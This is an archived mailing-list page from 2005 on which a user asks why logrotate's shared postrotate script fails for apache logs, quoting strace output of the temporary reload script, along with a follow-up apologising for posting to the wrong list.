Sorry, wrong list. Please ignore - Re: Logrotate failing for apache logs

2005-04-01 Thread Malcolm Ferguson
Malcolm Ferguson wrote:

Sorry, wrong list.  I meant to send to debian-user.
Malc
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Logrotate failing for apache logs

2005-04-01 Thread Malcolm Ferguson
I've just rebuild my server and now it appears that logrotate is failing 
for apache:

wolverine:/var/log# logrotate /etc/logrotate.d/apache
error running shared postrotate script for /var/log/apache/*.log
I've run the above command through strace and it looks like logrotate 
creates a file in /tmp and writes out a shell script to restart apache.  
I've tried recreating the script by hand and executing it from the 
command line, and it appears to work (echo $? displays 0).  So what 
could be wrong? 

Relevant part of strace's output:
open("/tmp/logrotate.97X4bM", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600) = 3
fchmod(3, 0700) = 0
write(3, "#!/bin/sh\n\n", 11)   = 11
write(3, "\n\t\t/etc/init.d/apache reload > /"..., 41) = 41
close(3)= 0
rt_sigaction(SIGINT, {SIG_IGN}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
fork()  = 15909
wait4(15909, [WIFEXITED(s) && WEXITSTATUS(s) == 1], 0, NULL) = 15909
rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) ---
unlink("/tmp/logrotate.97X4bM") = 0
write(2, "error running shared postrotate "..., 66error running shared 
postrotate script for /var/log/apache/*.log
) = 66

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


  1   2   3   4   5   6   7   8   9   10   >